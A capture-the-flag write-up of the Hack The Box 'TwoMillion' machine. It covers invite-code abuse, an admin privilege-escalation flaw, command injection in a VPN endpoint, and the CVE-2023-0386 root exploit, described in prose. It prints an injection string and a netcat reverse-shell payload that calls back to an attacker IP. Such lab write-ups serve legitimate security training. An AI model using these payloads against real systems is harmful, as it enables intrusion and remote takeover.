HTB - TwoMillion

Initial Setup:

Configuring the local hosts file to resolve the target hostname to the target IP address for easier access during enumeration and exploitation.

Reconnaissance Methodology:

Initial port scanning using Nmap with service detection and version enumeration to identify open ports and running services on the target host.

Key Findings:

• SSH Service: OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 running on port 22
• Web Server: nginx running on port 80
• HTTP Methods: GET, HEAD, POST, OPTIONS supported
• Operating System: Ubuntu Linux
• Redirect: HTTP redirects to http://2million.htb/
• SSH Hostkeys: ECDSA (256-bit), ED25519 (256-bit)

Next Steps:

• Web enumeration on port 80 (nginx application)
• Directory discovery using supported HTTP methods
• Application analysis of the web interface
• SSH service investigation

Web Enumeration Methodology:

Using feroxbuster to discover web directories and endpoints, identifying API routes and application functionality.

Key Findings:

• /api: API endpoint (401 Unauthorized)
• /js/inviteapi.min.js: Minified JavaScript file for invite API
• /api/v1/user/register: User registration endpoint (405 Method Not Allowed on GET)
• /api/v1/user/login: User login endpoint (405 Method Not Allowed on GET)
• /register: Registration page (200 OK)
• /login: Login page (200 OK)
• /invite: Invite code page (200 OK)

Critical Discovery:

The application requires an invite code to register. The /invite endpoint and inviteapi.min.js file suggest there's an API for generating invite codes.

API Discovery:

Making a POST request to /api/v1/invite/how/to/generate reveals encrypted instructions. The response indicates the data is encrypted with ROT13.

Key Findings:

• Encrypted Data: "Va beqre gb trarengr gur vaivgr pbqr, znxr n CBFG erdhrfg gb /ncv/i1/vaivgr/trarengr"
• Encryption Type: ROT13
• Hint: The response explicitly mentions checking the encryption type

Next Steps:

• Decode the ROT13 encrypted message
• Follow the instructions to generate an invite code

Invite Code Generation:

After decoding the ROT13 message, we make a POST request to /api/v1/invite/generate to obtain an invite code.

Process:

1. POST request to /api/v1/invite/generate returns a base64-encoded invite code
2. Decode the base64 string: RUtXN0otU0NLQlctVDlFRk4tMEhCVDE=
3. Result: EKW7J-SCKBW-T9EFN-0HBT1

Security Issues:

• Weak Protection: Invite codes can be generated without authentication
• Predictable Format: Base64 encoding provides minimal security
• No Rate Limiting: Unlimited invite code generation possible

API Enumeration:

After registering and logging in, we can enumerate the API routes to discover admin endpoints.

Key Findings:

• Admin Endpoints: Several admin-only endpoints discovered
• /api/v1/admin/settings/update: PUT endpoint to update user settings
• /api/v1/admin/vpn/generate: POST endpoint to generate VPN for users
• /api/v1/admin/auth: GET endpoint to check admin status

Attack Vector:

The /api/v1/admin/settings/update endpoint may allow privilege escalation if it doesn't properly validate admin permissions or if there's a logic flaw in the update mechanism.

Privilege Escalation Exploitation:

The /api/v1/admin/settings/update endpoint allows updating user settings, including the is_admin field, without proper authorization checks.

Exploitation Process:

1. Initial request without parameters returns error: "Missing parameter: email"
2. Request with email returns error: "Missing parameter: is_admin"
3. Request with both email and is_admin: "true" successfully updates user to admin

Security Issues:

• Missing Authorization: Non-admin users can access admin endpoints
• Insecure Direct Object Reference (IDOR): Users can modify their own admin status
• Weak Input Validation: String "true" is accepted as boolean value
• No Permission Checks: Endpoint doesn't verify if requester is already admin

Impact:

Any authenticated user can escalate their privileges to admin, gaining access to administrative functions and potentially sensitive data.

Command Injection Testing:

After gaining admin access, we test the /api/v1/admin/vpn/generate endpoint for command injection vulnerabilities.

Discovery:

• Vulnerable Parameter: The username parameter is passed to a system command
• Injection Point: Command injection via username parameter
• Proof of Concept: pretengineer; whoami # executes whoami command
• Result: Command output shows www-data, confirming injection

Security Issues:

• Unsanitized Input: Username parameter directly used in system commands
• No Input Validation: Special characters not filtered or escaped
• Command Execution: User input executed with system privileges

Reverse Shell Setup:

Using command injection to establish a reverse shell connection back to our attack machine.

Payload Breakdown:

• rm /tmp/f: Remove any existing named pipe
• mkfifo /tmp/f: Create a named pipe
• cat /tmp/f|sh -i 2>&1|nc 10.10.14.3 4444 >/tmp/f: Execute reverse shell through named pipe
• #: Comment out any trailing command characters

Access Gained:

• User: www-data
• Shell: Interactive shell access
• Next Steps: Enumerate system, find credentials, escalate privileges

Credential Discovery:

After gaining shell access as www-data, we enumerate the web root directory and discover a .env file containing database credentials.

Key Findings:

• Database Host: 127.0.0.1 (localhost)
• Database Name: htb_prod
• Username: admin
• Password: ************

Security Issues:

• Exposed Credentials: .env file readable by web server user
• Weak Password: Predictable password pattern
• File Permissions: Sensitive configuration file in web root

Next Steps:

Attempt to SSH into the system using the discovered credentials (admin:************).

SSH Access:

Using the discovered database credentials to authenticate via SSH and gain user-level access to the system.

Access Details:

• Username: admin
• Password: ************
• System: Ubuntu 22.04.2 LTS
• Kernel: Linux 5.15.70-051570-generic

User Flag:

Successfully retrieved the user flag: ************

Email Analysis:

After logging in, the system indicates "You have mail". Checking the mail reveals a hint about a kernel vulnerability in OverlayFS / FUSE.

Key Information:

• Kernel Version: 5.15.70-051570-generic (dated September 2022)
• Vulnerability: OverlayFS / FUSE CVE mentioned in email
• Target CVE: CVE-2023-0386 (OverlayFS vulnerability)

Research:

The email references a serious Linux kernel CVE in OverlayFS / FUSE. Researching kernel version 5.15.70 reveals CVE-2023-0386, a vulnerability that allows local privilege escalation.

Next Steps:

• Download and compile the CVE-2023-0386 exploit
• Transfer exploit to target system
• Execute exploit to gain root access

CVE-2023-0386 Exploitation:

CVE-2023-0386 is a Linux kernel vulnerability in OverlayFS that allows local privilege escalation. The exploit uses FUSE (Filesystem in Userspace) to create a malicious overlay mount.

Exploitation Process:

1. Compile Exploit: Build the exploit components (fuse, exp, getshell)
2. Run FUSE Component: Execute ./fuse to set up the FUSE filesystem
3. Execute Main Exploit: Run ./exp to trigger the vulnerability
4. Gain Root: Exploit creates a SUID binary that can be executed to gain root privileges

Technical Details:

• Vulnerability: Race condition in OverlayFS copy-up mechanism
• Impact: Local privilege escalation to root
• Affected Versions: Linux kernel 5.15.x (before patched versions)
• Exploit Method: FUSE-based overlay mount manipulation

Root Flag:

Successfully retrieved the root flag: ************